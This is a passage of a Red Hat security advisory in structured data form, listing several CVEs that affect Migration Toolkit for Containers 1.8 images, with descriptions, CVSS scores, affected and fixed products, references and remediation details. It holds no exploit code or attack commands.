"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-34158", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2024-09-06T21:20:12.126400+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310529", }, ], notes: [ { category: "description", text: "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34158", }, { category: "external", summary: "RHBZ#2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34158", url: "https://www.cve.org/CVERecord?id=CVE-2024-34158", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", }, { category: "external", summary: "https://go.dev/cl/611240", url: "https://go.dev/cl/611240", }, { category: "external", summary: "https://go.dev/issue/69141", url: "https://go.dev/issue/69141", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3107", url: "https://pkg.go.dev/vuln/GO-2024-3107", }, ], release_date: "2024-09-06T21:15:12.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", 